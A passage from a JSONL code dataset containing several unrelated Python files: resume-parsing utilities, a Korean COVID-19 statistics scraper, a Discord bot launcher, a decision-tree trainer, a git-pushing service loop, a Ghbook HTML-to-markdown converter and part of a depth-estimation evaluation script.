keywords.append(row[0])\n return keywords\n\ndef read_csv(input_file):\n file = open(input_file, 'r')\n reader = csv.reader(file)\n return reader\n\ndef get_major_word_list(dir_path):\n file_name = \"csvfiles/educational_major.csv\"\n reader = read_csv(dir_path + file_name)\n major_list = []\n for row in reader:\n major_list.append(row[0])\n return major_list\n\ndef search_major(text, degree, edu_obj): \n maxim = -1\n # Search for major\n for major in major_word_list:\n if major.lower() in (text.lower()) and len(major) > max:\n major = str(major).title()\n degree = degree.title()\n maxim = len(str(major))\n return degree_flag\n\ndef get_qualification_word_list(dir_path):\n file_name = \"csvfiles/qualification_degree_list.csv\"\n reader = read_csv(dir_path+file_name)\n qualification_word_dict = {}\n qualification_word_dict_no_spaces = {}\n abbr_list = []\n degree_list = []\n for row in reader:\n abbr_list.append(row[0])\n abbr_list.append(row[0].replace(\" \", ''))\n degree_list.append(row[1])\n degree_list.append(row[0].replace(\" \", ''))\n qualification_word_dict[row[0]] = row[1]\n qualification_word_dict_no_spaces[row[0].replace(\" \", '')] = row[1].replace(\" \", '')\n return qualification_word_dict, qualification_word_dict_no_spaces, abbr_list, degree_list\n\nimport os\n\ndef csv_to_list(file):\n import csv\n data = []\n with open(file, newline='') as f:\n reader = csv.reader(f)\n for row in reader:\n data.append(''.join(row))\n\n return data\n\ndef get_category_list():\n path = 'list/'\n filenames = os.listdir(path)\n segment = {}\n for file in filenames:\n if '.csv' in file:\n segment[str(os.path.splitext(file)[0])] = csv_to_list(os.path.join(path, file))\n segments = {}\n\n for key in segment.keys():\n l = []\n for i in range(len(segment[key])):\n l.append((segment[key][i]).upper())\n l.append((segment[key][i]).title())\n l.append((segment[key][i]).upper().replace(' ', ''))\n l.append((segment[key][i]).title().replace(' ', ''))\n segments[key] = l\n return segments\n\n\ndef print_segments(segment_category, segment_text, segment_count):\n for i in range(segment_count):\n print(style.BOLD + 'category: ' + segment_category[i] + style.END)\n print('segment: ' + segment_text[i])\n print('\\n') ","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":5139,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"631564737","text":"import requests\nfrom bs4 import BeautifulSoup\nfrom noti import send\n\nBASE_URL = \"http://ncov.mohw.go.kr/bdBoardList_Real.do?brdId=1&brdGubun=13&ncvContSeq=&contSeq=&board_id=&gubun=\"\n\nres = requests.get(BASE_URL)\nsoup = BeautifulSoup(res.content, 'html.parser')\n\nlast_updated = soup.select('div.timetable > p > span')[0].text\nlast_updated_month = last_updated.split('.')[0][1:]\nlast_updated_date = last_updated.split('.')[1]\n\nnational_data = soup.select(\n 'div.regional_patient_status_A > div.rpsa_detail > div > div.open > div.mapview > ul.cityinfo > li')\n\nnational_total_cases = national_data[0].select('div > span')\nnational_daily_change = national_data[1].select('div > span')\nnational_active_cases = national_data[2].select('div > span')\nnational_total_recovered = national_data[3].select('div > span')\nnational_total_deaths = national_data[4].select('div > span')\n\nprovince_data = soup.select('div.rpsam_graph > div > button > span')\nseoul_total_cases = province_data[1]\nseoul_daily_change = province_data[2]\nincheon_total_cases = province_data[10]\nincheon_daily_change = province_data[11]\ngyeonggi_total_cases = province_data[25]\ngyeonggi_daily_change = province_data[26]\n\nresult = f'🇰🇷COVID-19 Update🇰🇷\\n' + \\\n f'📆{last_updated_date}/{last_updated_month}/2020\\n\\n' + \\\n '😷National stats\\n' + \\\n f'Daily change: {national_daily_change[1].text[1:-1]}\\n' + \\\n f'Total cases: {national_total_cases[1].text}\\n' + \\\n f'Total deaths: {national_total_deaths[1].text}\\n\\n' + \\\n '😷Seoul stats\\n' + \\\n f'Daily change: {seoul_daily_change.text[1:-1]}\\n' + \\\n f'Total cases: {seoul_total_cases.text}\\n\\n' + \\\n '😷Incheon stats\\n' + \\\n f'Daily change: {incheon_daily_change.text[1:-1]}\\n' + \\\n f'Total cases: {incheon_total_cases.text}\\n\\n' + \\\n '😷Gyeonggi stats\\n' + \\\n f'Daily change: {gyeonggi_daily_change.text[1:-1]}\\n' + \\\n f'Total cases: {gyeonggi_total_cases.text}'\n\nprint(result)\nsend(result)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"366003151","text":"from dotenv import load_dotenv\nimport os\n\nfrom bot import bot\n\nif __name__ == '__main__':\n load_dotenv()\n token = os.getenv(\"TOKEN\")\n if token is None:\n print(\"Environment variable \\\"TOKEN\\\" not set\")\n exit(0)\n bot.run(token)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"218884928","text":"# Andrew Heyman\n# 10/04/2016\n\nimport pandas as pd\nimport pickle\n\n# Node class to store decisions\nclass Node:\n def __init__(self, lbl = None, threshold = None, col = None, tb = None, fb = None):\n self.lbl = lbl #class label\n self.threshold = threshold #the less than or equal value to be true\n self.col = col# column\n self.tb = tb\n self.fb = fb\n\nclass DecisionTree:\n \n '''\n Method to calcuate the Gini index of a column, in a \n specific dataframe\n '''\n @staticmethod\n def gini_index(thresh, column, df):\n\n leq_elements = 0\n greater_elements = 0\n\n low_class_0 = 0\n high_class_0 = 0\n\n for index, row in df.iterrows():\n if row[column] <= thresh:\n leq_elements += 1\n\n if row[(df.shape[1]-1)] == 0:\n low_class_0 += 1\n else:\n greater_elements += 1\n\n if row[(df.shape[1]-1)] == 0:\n high_class_0 += 1\n\n # Handle divide by 0 errors\n if leq_elements == 0:\n low_gini = 0\n else:\n low_gini = 1 - ((low_class_0 / leq_elements) ** 2 + (leq_elements - low_class_0) / leq_elements ** 2)\n\n if greater_elements == 0:\n high_gini = 0\n else:\n high_gini = 1 - ((high_class_0 / greater_elements) ** 2 + (greater_elements - high_class_0) / greater_elements** 2)\n\n return ( low_gini * leq_elements/df.shape[0] + high_gini * greater_elements/df.shape[0])\n\n '''\n Method to generate tree\n '''\n def generate_tree(self, df):\n if len(set(df['Class'].tolist())) == 1:\n return Node(lbl = df['Class'].tolist()[0] )\n else:\n root = Node()\n [root.threshold, root.col] = DecisionTree.best_split(df)\n\n # split up the dataset based on the threshold\n # for each of the splits\n\n lower = df.loc[df[root.col] <= root.threshold]\n upper = df.loc[df[root.col] > root.threshold]\n\n root.tb = DecisionTree.generate_tree(self, lower )\n root.fb = DecisionTree.generate_tree(self, upper )\n return root\n\n\n '''\n Finds the best split in a dataframe\n ''' \n @staticmethod\n def best_split(dataframe):\n\n # Lowest Gini\n min_gini = float(\"inf\")\n ideal_col = -1\n ideal_bin = -1\n\n # For each column\n for column in dataframe:\n\n if column == \"Class\":\n break\n else:\n # Make quantile bins in groups of quartlies bins\n bins = pd.qcut(dataframe[column], 4, retbins=True)\n\n # Find the min gini\n for bin in bins[1]:\n bin_gini = DecisionTree.gini_index(bin, column, dataframe)\n if (bin_gini < min_gini):\n min_gini = bin_gini\n ideal_col = column\n ideal_bin = bin\n\n return [ideal_bin, ideal_col]\n\n '''\n Simple method to print tree, adding spaces as depth continues\n '''\n @staticmethod\n def tree_print(tree, space=\"\"):\n if tree.lbl is not None:\n print(\"value: \" + str(tree.lbl))\n else:\n print(\"if \" + tree.col+ \" <= \" + str(tree.threshold) +\" ?\")\n\n print(space + \"True:\", end=' ')\n DecisionTree.tree_print(tree.tb, space + \" \")\n print(space + \"else:\", end=' ')\n DecisionTree.tree_print(tree.fb, space + \" \")\n\n @staticmethod\n def generate_program(tree):\n pickle.dump(tree, open(\"tree.p\",\"wb\"))\n\n'''\nGenerates tree as a pickle file\nAllows classifier to work\n'''\nclass TryIt:\n\n file_loc = r\"RawData.csv\"\n df = pd.read_csv(file_loc)\n\n tree = DecisionTree()\n\n root = tree.generate_tree(df)\n tree.generate_program(root)\n tree.tree_print(root)\n","sub_path":"HW_04B_Heyman_Andrew_Trainer.py","file_name":"HW_04B_Heyman_Andrew_Trainer.py","file_ext":"py","file_size_in_byte":3890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"425109871","text":"from make import Clear, getUSTVGO, replaceUStVicons, MakeCS, MakeEng, MakeMain, Git, pushbulletMode, remPYC, RemoveMode2\nfrom Auth.auth import name, Email, gitToken, gitRepo\nimport time\nimport os\n\ntoken = gitToken\nrepo = gitRepo\nemail = Email\n\norigin = \"sudo git remote set-url origin https://github:\" + str(token) + str(repo)\nconfig_mail = \"sudo git config --global user.email \" + email\nconfig_name = \"sudo git config --global user.name \" + name\n\n\ndef echo(msg):\n echocmd = \"sudo echo \" + '\"' + msg + '\"'\n os.system(echocmd)\n\nauto = True\ntimeoutTime = open('Assets/Service/timeou.txt').read()\nint(timeoutTime)\n\nmsg = \"Timeout time is: \" + str(timeoutTime)\n\necho(msg)\n\ndef Main():\n RemoveMode2()\n Clear()\n getUSTVGO()\n replaceUStVicons()\n MakeCS()\n MakeEng()\n MakeMain()\n Git()\n #pushbulletMode(5)\n remPYC()\n \n\nwhile auto == True:\n Main()\n echo(\"Waiting \" + str(timeoutTime) + \"Seconds\")\n time.sleep(int(timeoutTime))\n","sub_path":"service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"406028388","text":"\"\"\"Convert Ghbook library html to OpenITI mARkdown.\n\nThis script subclasses the generic MarkdownConverter class\nfrom the html2md module (based on python-markdownify,\nhttps://github.com/matthewwithanm/python-markdownify),\nwhich uses BeautifulSoup to create a flexible converter.\n\nThe subclass in this module, GhbookHtmlConverter,\nadds methods specifically for the conversion of books from\nthe eShia library to OpenITI mARkdown:\n\n* Span, div and p conversion: span, div and p classes needed to be converted\n are defined in self.class_dict.\n\n\nInheritance schema of the GhbookHtmlConverter:\n\n======================== ==========================\nMarkdownConverter GhbookHtmlConverter\n======================== ==========================\nOptions (inherited)\nDefaultOptions (inherited)\n__init__ (inherited)\n__getattr__ (inherited)\nconvert (inherited)\nprocess_tag (inherited)\nprocess_text (inherited)\nfill_out_columns (inherited)\npost_process_md (inherited)\nshould_convert_tag (inherited)\nindent (inherited)\nunderline (inherited)\ncreate_underline_line (inherited)\nconvert_a (inherited)\nconvert_b (inherited)\nconvert_blockquote (inherited)\nconvert_br (inherited)\nconvert_em (inherited)\nconvert_hn (inherited)\nconvert_i (inherited)\nconvert_img (inherited)\nconvert_list (inherited)\nconvert_li (inherited)\nconvert_ol (inherited)\nconvert_p convert_p\nconvert_table (inherited)\nconvert_tr (inherited)\nconvert_ul (inherited)\nconvert_strong (inherited)\n convert_span\n convert_div\n======================== ==========================\n\n\"\"\"\nimport re\n\nif __name__ == '__main__':\n from os import sys, path\n root_folder = path.dirname(path.dirname(path.abspath(__file__)))\n root_folder = path.dirname(path.dirname(path.dirname(root_folder)))\n sys.path.append(root_folder)\n\nfrom openiti.new_books.convert.helper import html2md\nfrom openiti.new_books.convert.helper.html2md import * # import all constants!\n\n\nclass GhbookHtmlConverter(html2md.MarkdownConverter):\n \"\"\"Convert Ghbook library html to OpenITI mARkdown.\n\n Examples:\n >>> import html2md_Ghbook\n >>> h = '<img class=\"libimages\" src=\"/images/books/86596/01/cover.jpg\">'\n >>> html2md_Ghbook.markdownify(h)\n '![](img/86596/01/cover.jpg)'\n\n >>> import html2md_Ghbook\n >>> h = 'abc <a href=\"www.example.com\">def</a> ghi'\n >>> html2md_Ghbook.markdownify(h)\n 'abc def ghi'\n \"\"\"\n\n def __init__(self, **options):\n super().__init__(**options)\n self.class_dict = dict()\n self.class_dict[\"rightpome\"] = \"\\n# {} %~% \" # <span class>\n self.class_dict[\"leftpome\"] = \"{}\\n\" # <span class>\n self.class_dict[\"footnote\"] = \"{}\\n\" # <div class>\n## ##old:\n## self.class_dict[\"Titr3\"] = \"\\n\\n### ||| {}\\n\\n\" # <span class>\n## self.class_dict[\"KalamateKhas2\"] = \"\\n\\n### || {}\\n\\n\" # <p class>\n## self.class_dict[\"KalamateKhas\"] = \"\\n\\n### ||| {}\\n\\n\" # <p class>\n## self.class_dict[\"TextsStyles3\"] = \"\\n\\n### ||| {}\\n\\n\" # <p class>\n## self.class_dict[\"TextsStyles1\"] = \"@QUR@ {}\\n\" # <span class>\n## self.class_dict[\"Aye\"] = \"@QUR@ {}\\n\" # <span class>\n## self.class_dict[\"tdfehrest2\"] = \"\\t{}\" # <td class>\n## self.class_dict[\"list3\"] = \"\\t{}\" # <div class>\n## self.class_dict[\"sher\"] = \"# {}\\n\" # <p class>\n## self.class_dict[\"#6C3934\"] = \"\\n\\n# {}\\n\\n\" # <span class>\n\n self.options[\"image_link_regex\"] = \"/?images/books\"\n## self.options[\"image_folder\"] = \"img\"\n self.options[\"strip\"] = [\"a\", \"img\"]\n\n\n def convert_span(self, el, text):\n \"\"\"Converts html <span> tags, depending on their class attribute.\n\n Supported span classes should be stored in self.class_dict\n (key: span class (str); value: formatting string)\n E.g., {\"quran\": \"@QUR@ {}\\\\n\"}\n\n Example:\n >>> import html2md_Ghbook\n >>> h = 'abc <span>def</span> ghi'\n >>> html2md_Ghbook.markdownify(h)\n 'abc def ghi'\n\n >>> h = 'abc <span class=\"unknown_span_class\">def</span> ghi'\n >>> html2md_Ghbook.markdownify(h)\n 'abc def ghi'\n\n #>>> h = 'abc <span class=\"Aya\">def ghi</span> jkl'\n #>>> html2md_Ghbook.markdownify(h)\n #'abc @QUR02 def ghi jkl'\n\n # the @QUR@ example outputs are a result of post-processing;\n # the function itself will produce:\n # 'abc @QUR@ def ghi\\\\njkl'\n \n >>> h = '<span class=\"rightpome\">abc def</span><span class=\"leftpome\">ghi jkl</span>'\n >>> html2md_Ghbook.markdownify(h)\n '\\\\n# abc def %~% ghi jkl'\n \"\"\"\n try: # will fail if el has no class attribute\n for c in el[\"class\"]:\n #print(c)\n if c in self.class_dict:\n return self.class_dict[c].format(text) if text else ''\n if c == \"ayah\":\n try:\n sura = el[\"surah\"]\n except:\n sura = \"0\"\n try:\n aya = el[\"ayah\"]\n except:\n aya = \"0\"\n #print(\"@QUR{}.{}@ {}\".format(sura, aya, text))\n return \"@QUR{}.{}@ {}\\n\".format(sura, aya, text)\n except Exception as e:\n pass\n return text\n\n\n def convert_div(self, el, text):\n \"\"\"Converts html <div> tags, depending on their class attribute.\n\n Supported div classes should be stored in self.class_dict\n (key: div class (str); value: formatting string)\n\n Example:\n >>> import html2md_Ghbook\n >>> h = 'abc <div>def</div> ghi'\n >>> html2md_Ghbook.markdownify(h)\n 'abc def ghi'\n\n >>> h = 'abc <div class=\"unknown_div_class\">def</div> ghi'\n >>> html2md_Ghbook.markdownify(h)\n 'abc def ghi'\n\n >>> h = '<div class=\"ClssDivMeesage\">Page Is Empty</div>'\n >>> html2md_Ghbook.markdownify(h)\n ''\n \"\"\"\n try: # will fail if el has no class attribute\n for c in el[\"class\"]:\n if c in self.class_dict:\n return self.class_dict[c].format(text) if text else ''\n if c == \"ClssDivMeesage\":\n return \"\"\n except Exception as e:\n pass\n return text\n\n def convert_p(self, el, text):\n \"\"\"Converts <p> tags according to their class.\n\n Supported p classes should be stored in self.class_dict\n (key: span class (str); value: formatting string)\n E.g., {\"quran\": \"@QUR@ {}\\\\n\"}\n\n <p> tags without class attribute, or unsupported class,\n will be converted according to the markdown style\n as defined in the self.options[\"md_style\"] value\n (from super().DefaultOptions)\n\n Examples:\n >>> import html2md_Ghbook\n >>> h = \"<p>abc</p>\"\n >>> html2md_Ghbook.markdownify(h)\n '\\\\n\\\\n# abc\\\\n\\\\n'\n\n >>> h = \"<p>abc</p>\"\n >>> html2md_Ghbook.markdownify(h, md_style=ATX)\n '\\\\n\\\\nabc\\\\n\\\\n'\n\n >>> h = \"<p></p>\"\n >>> html2md_Ghbook.markdownify(h, md_style=ATX)\n ''\n \"\"\"\n if self.options['md_style'] == OPENITI:\n return '\\n\\n# %s\\n\\n' % text if text else ''\n else:\n return '\\n\\n%s\\n\\n' % text if text else ''\n\n def convert_sup(self, el, text):\n \"\"\"Converts <sup> tags (used for footnote markers).\"\"\"\n return \"({})\".format(text.strip())\n \n\n\ndef markdownify(html, **options):\n \"\"\"Shortcut to the convert method of the HindawiConverter class.\"\"\"\n return GhbookHtmlConverter(**options).convert(html)\n\n\nif __name__ == \"__main__\":\n import doctest\n doctest.testmod()\n","sub_path":"openiti/new_books/convert/helper/html2md_Ghbook.py","file_name":"html2md_Ghbook.py","file_ext":"py","file_size_in_byte":8448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"395566152","text":"from __future__ import absolute_import, division, print_function\nimport time\nimport os\nimport cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport copy\nimport torch\nfrom torch.utils.data import DataLoader\nimport torch.nn.functional as F\nfrom layers import *\nfrom utils import readlines\nfrom options import MonodepthOptions\nimport datasets\nimport networks\nimport cityscapesscripts.helpers.labels\nfrom utils import *\nfrom cityscapesscripts.evaluation.evalPixelLevelSemanticLabeling import *\nfrom cityscapesscripts.helpers.labels import *\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom matplotlib.backends.backend_agg import FigureCanvasAgg as FigureCanvas\nfrom matplotlib.figure import Figure\n\nsplits_dir = os.path.join(os.path.dirname(__file__), \"splits\")\nSTEREO_SCALE_FACTOR = 5.4\n\ndef tensor2rgb(tensor, ind):\n slice = (tensor[ind, :, :, :].permute(1,2,0).cpu().numpy() * 255).astype(np.uint8)\n # pil.fromarray(slice).show()\n return pil.fromarray(slice)\n\ndef tensor2semantic(tensor, ind, isGt = False):\n slice = tensor[ind, :, :, :]\n if not isGt:\n slice = F.softmax(slice, dim=0)\n slice = torch.argmax(slice, dim=0).cpu().numpy()\n else:\n slice = slice[0,:,:].cpu().numpy()\n # visualize_semantic(slice).show()\n return visualize_semantic(slice)\n\ndef tensor2disp(tensor, ind, vmax = None):\n # slice = tensor[]\n # plt.imsave(name_dest_im, disp_resized_np, cmap='magma', vmax=vmax)\n slice = tensor[ind, 0, :, :].cpu().numpy()\n if vmax is None:\n vmax = np.percentile(slice, 90)\n slice = slice / vmax\n # slice = slice / slice.max()\n cm = plt.get_cmap('magma')\n slice = (cm(slice) * 255).astype(np.uint8)\n # pil.fromarray(slice).show()\n return pil.fromarray(slice)\n\nclass Tensor23dPts:\n def __init__(self):\n self.height = 1024\n self.width = 2048\n xx, yy = np.meshgrid(np.arange(self.width), np.arange(self.height))\n self.xx = xx.flatten()\n self.yy = yy.flatten()\n objType = 19\n self.colorMap = np.zeros((objType + 1, self.xx.shape[0], 3), dtype=np.uint8)\n for i in range(objType):\n if i == objType:\n k = 255\n else:\n k = i\n self.colorMap[i, :, :] = np.repeat(np.expand_dims(np.array(trainId2label[k].color), 0), self.xx.shape[0], 0)\n self.colorMap = self.colorMap.astype(np.float)\n self.colorMap = self.colorMap / 255\n\n\n def visualize3d(self, tensor, ind, intrinsic, extrinsic, gtmask = None, gtdepth = None, semanticMap = None):\n assert tensor.shape[1] == 1, \"please input single channel depth map\"\n self.height = 1024\n self.width = 2048\n tensor = F.interpolate(tensor, [self.height, self.width], mode=\"bilinear\", align_corners=False)\n intrinsic = intrinsic.cpu().numpy()\n extrinsic = extrinsic.cpu().numpy()\n slice = tensor[ind, 0, :, :].cpu().numpy()\n\n depthFlat = slice.flatten()\n oneColumn = np.ones(self.height * self.width)\n pixelLoc = np.stack([self.xx * depthFlat, self.yy * depthFlat, depthFlat, oneColumn], axis=1)\n cam_coord = (np.linalg.inv(intrinsic) @ pixelLoc.T).T\n veh_coord = (np.linalg.inv(extrinsic) @ cam_coord.T).T\n colors = None\n\n if gtmask is not None and gtdepth is not None:\n gtdepth = gtdepth.cpu().numpy()\n mask = gtdepth > 0\n # mask = gtdepth > -1000000\n mask = mask.flatten()\n depthFlat = gtdepth.flatten()\n oneColumn = np.ones(gtdepth.shape[0] * gtdepth.shape[1])\n pixelLoc = np.stack([self.xx[mask] * depthFlat[mask], self.yy[mask] * depthFlat[mask], depthFlat[mask], oneColumn[mask]], axis=1)\n cam_coord = (np.linalg.inv(intrinsic) @ pixelLoc.T).T\n veh_coord_2 = (np.linalg.inv(extrinsic) @ cam_coord.T).T\n\n veh_coord = veh_coord[mask, :]\n if semanticMap is not None:\n semanticMap = semanticMap.cpu().numpy()\n semanticMap = semanticMap.flatten()\n semanticMap[semanticMap == 255] = 19\n colors = self.colorMap[semanticMap, np.arange(self.xx.shape[0]), :]\n if mask is not None:\n colors = colors[mask, :]\n\n\n camPos = (np.linalg.inv(extrinsic) @ np.array([0,0,0,1]).T).T\n veh_coord[:, 0:3] = veh_coord[:, 0:3] - np.repeat(np.expand_dims(camPos, 0)[:,0:3], veh_coord.shape[0], 0)\n veh_coord_2[:, 0:3] = veh_coord_2[:, 0:3] - np.repeat(np.expand_dims(camPos, 0)[:,0:3], veh_coord_2.shape[0], 0)\n\n tmpImgName = 'tmp1.png'\n fig = plt.figure()\n ax = Axes3D(fig)\n ax.view_init(elev=6., azim=170)\n ax.dist = 4\n if colors is None:\n ax.scatter(veh_coord[0::100,0], veh_coord[0::100,1], veh_coord[0::100,2], s=0.1, c = 'b')\n ax.scatter(veh_coord_2[0::100, 0], veh_coord_2[0::100, 1], veh_coord_2[0::100, 2], s=0.1, c='r')\n else:\n ax.scatter(veh_coord_2[0::50, 0], veh_coord_2[0::50, 1], veh_coord_2[0::50, 2], s=0.5, c = colors[0::50, :])\n ax.scatter(camPos[0], camPos[1], camPos[2], s=10, c='g')\n ax.set_zlim(-10, 10)\n plt.ylim([-10, 10])\n plt.xlim([10, 16])\n set_axes_equal(ax)\n fig.savefig(tmpImgName)\n plt.close(fig)\n img1 = pil.open(tmpImgName)\n\n tmpImgName = 'tmp2.png'\n fig = plt.figure()\n ax = Axes3D(fig)\n ax.view_init(elev=6., azim=170)\n ax.dist = 4\n if colors is None:\n ax.scatter(veh_coord[0::100,0], veh_coord[0::100,1], veh_coord[0::100,2], s=0.1, c = 'b')\n ax.scatter(veh_coord_2[0::100, 0], veh_coord_2[0::100, 1], veh_coord_2[0::100, 2], s=0.1, c='r')\n else:\n ax.scatter(veh_coord[0::50,0], veh_coord[0::50,1], veh_coord[0::50,2], s=0.5, c = colors[0::50, :])\n ax.scatter(camPos[0], camPos[1], camPos[2], s=10, c='g')\n ax.set_zlim(-10, 10)\n plt.ylim([-10, 10])\n plt.xlim([10, 16])\n set_axes_equal(ax)\n fig.savefig(tmpImgName)\n plt.close(fig)\n img2 = pil.open(tmpImgName)\n img = Image.fromarray(np.concatenate([np.array(img1)[:,:,0:3], np.array(img2)[:,:,0:3]], axis=1))\n\n return img, veh_coord, veh_coord_2\n\nclass Comp1dgrad(nn.Module):\n def __init__(self):\n super(Comp1dgrad, self).__init__()\n self.act = nn.Sigmoid()\n self.gradth = 0.1\n self.init_gradconv()\n # self.init_gaussconv(kernel_size=3, sigma=2, channels=1)\n\n\n\n # def init_gaussconv(self, kernel_size=3, sigma=2, channels=1):\n # self.gaussconv = get_gaussian_kernel(kernel_size=kernel_size, sigma=sigma, channels=channels)\n # self.gaussconv.cuda()\n def init_gradconv(self):\n weightsx = torch.Tensor([[-1., 0., 1.],\n [-2., 0., 2.],\n [-1., 0., 1.]]).unsqueeze(0).unsqueeze(0)\n\n weightsy = torch.Tensor([[1., 2., 1.],\n [0., 0., 0.],\n [-1., -2., -1.]]).unsqueeze(0).unsqueeze(0)\n self.convx = nn.Conv2d(in_channels=1, out_channels=1, kernel_size=3, padding=0, bias=False)\n self.convy = nn.Conv2d(in_channels=1, out_channels=1, kernel_size=3, padding=0, bias=False)\n\n self.convx.weight = nn.Parameter(weightsx,requires_grad=False)\n self.convy.weight = nn.Parameter(weightsy,requires_grad=False)\n\n self.convx.cuda()\n self.convy.cuda()\n # self.gaussKernel =\n def forward(self, tensor, boot = 1):\n # tensor_blurred = self.gaussconv(tensor)\n tensor_blurred = tensor\n grad_x = torch.abs(self.convx(tensor_blurred))\n grad_y = torch.abs(self.convy(tensor_blurred))\n # grad = (grad_x + grad_y - 0.012) / tensor_blurred[:,:,1:-1,1:-1] * 200 - 6\n grad = (grad_x + grad_y - 0.012) / tensor_blurred[:, :, 1:-1, 1:-1] * 10 - 6\n grad = self.act(grad)\n # vmax = np.percentile(grad.cpu().numpy(), 99)\n # a = grad.cpu().numpy()\n\n # grad_x = torch.abs(tensor[:, :, :-1, :-1] - tensor[:, :, :-1, 1:])\n # grad_y = torch.abs(tensor[:, :, :-1, :-1] - tensor[:, :, 1:, :-1])\n # grad = (grad_x + grad_y) * boostParam\n # grad = self.act(grad)\n # tensor2disp(grad, ind = 0, vmax=1).show()\n # tensor2disp(tensor, ind = 0).show()\n return grad\n\n\ndef evaluate(opt):\n \"\"\"Evaluates a pretrained model using a specified test set\n \"\"\"\n MIN_DEPTH = 1e-3\n MAX_DEPTH = 80\n\n opt.load_weights_folder = os.path.expanduser(opt.load_weights_folder)\n\n assert os.path.isdir(opt.load_weights_folder), \\\n \"Cannot find a folder at {}\".format(opt.load_weights_folder)\n\n print(\"-> Loading weights from {}\".format(opt.load_weights_folder))\n\n filenames = readlines(os.path.join(splits_dir, opt.split, \"val_files.txt\"))\n encoder_path = os.path.join(opt.load_weights_folder, \"encoder.pth\")\n decoder_path = os.path.join(opt.load_weights_folder, \"depth.pth\")\n\n encoder_dict = torch.load(encoder_path)\n\n if opt.use_stereo:\n opt.frame_ids.append(\"s\")\n if opt.dataset == 'cityscape':\n dataset = datasets.CITYSCAPERawDataset(opt.data_path, filenames,\n encoder_dict['height'], encoder_dict['width'], opt.frame_ids, 4, is_train=False, tag=opt.dataset, load_meta=True, is_sep_train_seman = False)\n elif opt.dataset == 'kitti':\n dataset = datasets.KITTIRAWDataset(opt.data_path, filenames,\n encoder_dict['height'], encoder_dict['width'], opt.frame_ids, 4, is_train=False, tag=opt.dataset)\n else:\n raise ValueError(\"No predefined dataset\")\n dataloader = DataLoader(dataset, batch_size=opt.batch_size, shuffle=False, num_workers=opt.num_workers,\n pin_memory=True, drop_last=True)\n\n encoder = networks.ResnetEncoder(opt.num_layers, False)\n if opt.switchMode == 'on':\n depth_decoder = networks.DepthDecoder(encoder.num_ch_enc, isSwitch=True, isMulChannel=opt.isMulChannel)\n else:\n depth_decoder = networks.DepthDecoder(encoder.num_ch_enc)\n\n model_dict = encoder.state_dict()\n encoder.load_state_dict({k: v for k, v in encoder_dict.items() if k in model_dict})\n depth_decoder.load_state_dict(torch.load(decoder_path))\n\n encoder.cuda()\n encoder.eval()\n depth_decoder.cuda()\n depth_decoder.eval()\n\n # x = torch.ones(2, 2, requires_grad=True)\n # print(x)\n # y = x + 2 + x\n # y = y.detach()\n # print(y)\n # z = y * y * 3\n # out = z.mean()\n # print(z, out)\n # out.backward()\n # print(x.grad)\n\n ##--------------------Visualization parameter here----------------------------##\n sfx = torch.nn.Softmax(dim=1)\n mergeDisp = Merge_MultDisp(opt.scales, batchSize = opt.batch_size, isMulChannel = opt.isMulChannel)\n svRoot = '/media/shengjie/other/sceneUnderstanding/monodepth2/internalRe/figure_visual'\n index = 0\n isvisualize = True\n viewEdgeMerge = False\n isHist = False\n useGtSeman = True\n viewSurfaceNormal = True\n viewSelfOcclu = True\n viewDispUp = True\n viewSmooth = True\n viewMulReg = True\n viewBorderRegress = False\n viewBorderSimilarity = False\n viewRandomSample = True\n viewSemanReg = False\n viewDepthGuess = False\n height = 256\n width = 512\n tensor23dPts = Tensor23dPts()\n\n if isHist:\n rec = np.zeros((19,100))\n\n if opt.isMulChannel:\n app = os.path.join('mulDispOn', opt.model_name)\n else:\n app = os.path.join('mulDispOff', opt.model_name)\n\n dirpath = os.path.join(svRoot, app)\n if not os.path.exists(dirpath):\n os.makedirs(dirpath)\n\n if viewEdgeMerge:\n comp1dgrad = Comp1dgrad().cuda()\n\n if viewSurfaceNormal:\n compsn = ComputeSurfaceNormal(height = height, width = width, batch_size = opt.batch_size).cuda()\n\n if viewSelfOcclu:\n selfclu = SelfOccluMask().cuda()\n\n with torch.no_grad():\n for idx, inputs in enumerate(dataloader):\n # if idx != 12:\n # continue\n for key, ipt in inputs.items():\n if not(key == 'height' or key == 'width' or key == 'tag' or key == 'cts_meta'):\n inputs[key] = ipt.to(torch.device(\"cuda\"))\n input_color = inputs[(\"color\", 0, 0)].cuda()\n # input_color = torch.flip(input_color, dims=[3])\n features = encoder(input_color)\n outputs = dict()\n outputs.update(depth_decoder(features, computeSemantic=True, computeDepth=False))\n outputs.update(depth_decoder(features, computeSemantic=False, computeDepth=True))\n\n # view the processed semantic seperate training data\n # for viewInd in range(opt.batch_size):\n # label = inputs['semanTrain_label']\n # visualize_semantic(label[viewInd, 0, :, :].cpu().numpy()).show()\n # fig_rgb = inputs['semanTrain_rgb'][viewInd, :, :, :].permute(1, 2, 0).cpu().numpy()\n # fig_rgb = (fig_rgb * 255).astype(np.uint8)\n # fig_rgb = pil.fromarray(fig_rgb)\n # fig_rgb.show()\n\n\n if isHist:\n mulDisp = outputs[('mul_disp', 0)]\n scaled_disp, mulDepth = disp_to_depth(mulDisp, 0.1, 100)\n mulDepth = mulDepth.cpu()\n for i in range(mulDisp.shape[1]):\n rec[i,:] += torch.histc(mulDepth[:,i,:,:],bins=100,min=0,max=100).numpy()\n\n if isvisualize:\n if useGtSeman:\n # outputs[('mul_disp', 0)][:,2,:,:] = outputs[('mul_disp', 0)][:,2,:,:] * 0\n # outputs[('mul_disp', 0)][:, 12, :, :] = outputs[('mul_disp', 0)][:, 12, :, :] * 0\n mergeDisp(inputs, outputs, eval=False)\n else:\n mergeDisp(inputs, outputs, eval=True)\n\n dispMap = 